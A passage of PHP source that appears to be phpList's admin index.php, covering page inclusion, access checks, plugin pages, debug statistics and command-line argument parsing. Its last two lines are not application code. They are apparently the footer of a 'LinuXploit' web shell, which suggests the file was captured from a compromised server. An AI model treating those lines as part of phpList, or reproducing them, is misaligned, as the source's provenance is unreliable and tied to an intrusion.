            'The pageroot in your config "%s" does not match the current location "%s". Check your config file.',
            $pageroot,
            strstr(getenv('REQUEST_URI'), '/admin', true)
        ));
    }
}
clearstatcache();
if (empty($_GET['pi']) && (is_file($include) || is_link($include))) {

    if (checkAccess($page) || $page == 'about') {
        // check whether there is a language file to include
        if (is_file('lan/'.$_SESSION['adminlanguage']['iso'].'/'.$include)) {
            include 'lan/'.$_SESSION['adminlanguage']['iso'].'/'.$include;
        }
        if (is_file('ui/'.$GLOBALS['ui'].'/pages/'.$include)) {
            $include = 'ui/'.$GLOBALS['ui'].'/pages/'.$include;
        }
        //  print "Including $include<br/>";

        // hmm, pre-parsing and capturing the error would be nice
        //$parses_ok = eval(@file_get_contents($include));
        $parses_ok = 1;

        if (!$parses_ok) {
            echo Error("cannot parse $include");
            echo '<p class="error">Sorry, an error occurred. This is a bug. Please <a href="https://github.com/phpList/phplist3/issues">report the bug to the Bug Tracker</a><br/>Sorry for the inconvenience</a></p>';
        } else {
            if (!empty($_SESSION['action_result'])) {
                echo '<div class="actionresult">'.$_SESSION['action_result'].'</div>';
//        print '<script>alert("'.$_SESSION['action_result'].'")</script>';
                unset($_SESSION['action_result']);
            }

            if ($GLOBALS['commandline'] || !empty($_GET['secret'])) {
                @ob_end_clean();
                @ob_start();
            }
            $mm = inMaintenanceMode();
            if (empty($mm) || $GLOBALS['commandline'] || $page == 'login' || $page == 'about' || $page == 'community') {
                if (isset($GLOBALS['developer_email'])) {
                    include $include;
                } else {
                    @include $include;
                }
            } else {
                print '<h1>'.s('phpList is in maintenance mode.<br/>Please try again in half an hour.'). '<h1>';
            }
        }
    } else {
        Error(s('Access Denied'));
    }
//  print "End of inclusion<br/>";
} elseif ($plugin !== null && isset($GLOBALS['plugins']) && is_array($GLOBALS['plugins']) && is_object($GLOBALS['plugins'][$_GET['pi']])) {

    $menu = $plugin->adminmenu();

    if (checkAccess($page, $_GET['pi'])) {
        if (is_file($plugin->coderoot.$include)) {
            include $plugin->coderoot.$include;
        } elseif ($include == 'main.php' || $page == 'home') {
            echo '<h3>'.$plugin->name.'</h3><ul>';
            foreach ($menu as $page => $desc) {
                echo '<li>'.PageLink2($page, $desc).'</li>';
            }
            echo '</ul>';
        } elseif ($page != 'login') {
            echo '<br/>'."$page -&gt; ".s('Sorry this page was not found in the plugin').'<br/>'; //.' '.$plugin->coderoot.$include.'<br/>';
            cl_output("$page -> ".s('Sorry this page was not found in the plugin')); //. ' '.$plugin->coderoot . "$include");
        }
    } else {
        Error(s('Access Denied'));
    }
} else {
    if ($GLOBALS['commandline']) {
        clineError(s('Sorry, that module does not exist'));
        exit;
    }
    if (is_file('ui/'.$GLOBALS['ui'].'/pages/'.$include)) {
        include 'ui/'.$GLOBALS['ui'].'/pages/'.$include;
    } else {
        echo "$page -&gt; ".$GLOBALS['I18N']->get('Sorry, not implemented yet');
    }
}

// some debugging stuff
$now = gettimeofday();
$finished = $now['sec'] * 1000000 + $now['usec'];
$elapsed = $finished - $GLOBALS['pagestats']['time_start'];
$elapsed = ($elapsed / 1000000);

echo "\n\n".'<!--';
if (!empty($GLOBALS['developer_email'])) {
    echo '<br clear="all" />';
    echo $GLOBALS['pagestats']['number_of_queries']." db queries in $elapsed seconds";
    if (function_exists('memory_get_peak_usage')) {
        $memory_usage = 'Peak: '.memory_get_peak_usage();
    } elseif (function_exists('memory_get_usage')) {
        $memory_usage = memory_get_usage();
    } else {
        $memory_usage = 'Cannot determine with this PHP version';
    }
    echo '<br/>Memory usage: '.$memory_usage;
}

if (isset($GLOBALS['statslog']) && !empty($_SERVER['REQUEST_URI'])) {
    if ($fp = @fopen($GLOBALS['statslog'], 'a')) {
        @fwrite($fp,
            $GLOBALS['pagestats']['number_of_queries']."\t$elapsed\t".$_SERVER['REQUEST_URI']."\t NAME:".$GLOBALS['installation_name']."\n");
    }
}
echo '-->';

if (!empty($GLOBALS['inRemoteCall']) || $ajax || !empty($GLOBALS['commandline'])) {
    @ob_end_clean();
    exit;
} elseif (!isset($_GET['omitall'])) {
    if (!$GLOBALS['compression_used']) {
        @ob_end_flush();
    }

    if (USE_MINIFIED_ASSETS && file_exists(dirname(__FILE__).'/ui/'.$GLOBALS['ui'].'/footer_minified.inc')) {
        include_once 'ui/'.$GLOBALS['ui'].'/footer_minified.inc';
    } else {
        include_once 'ui/'.$GLOBALS['ui'].'/footer.inc';
    }
}
if (isset($GLOBALS['pagefooter'])) {
    foreach ($GLOBALS['pagefooter'] as $sFooterItem => $sHtml) {
        echo '<!--'.$sFooterItem.'-->'.$sHtml;

        echo "\n";
    }
}
echo '</body></html>';

function parseCline()
{
    $res = array();
    $cur = '';
    foreach ($GLOBALS['argv'] as $clinearg) {
        if (substr($clinearg, 0, 1) == '-') {
            $par = substr($clinearg, 1, 1);
            $clinearg = substr($clinearg, 2, strlen($clinearg));
            // $res[$par] = "";
            $cur = mb_strtolower($par);
            if (!isset($res[$cur])) {
                $res[$cur] = '';
            }
            $res[$cur] .= $clinearg;
        } elseif ($cur) {
            if ($res[$cur]) {
                $res[$cur] .= ' '.$clinearg;
            } else {
                $res[$cur] .= $clinearg;
            }
        }
    }
    /*  ob_end_clean();
      foreach ($res as $key => $val) {
        print "$key = $val\n";
      }
      ob_start();*/
    return $res;
}

Youez - 2016 - github.com/yon3zu
LinuXploit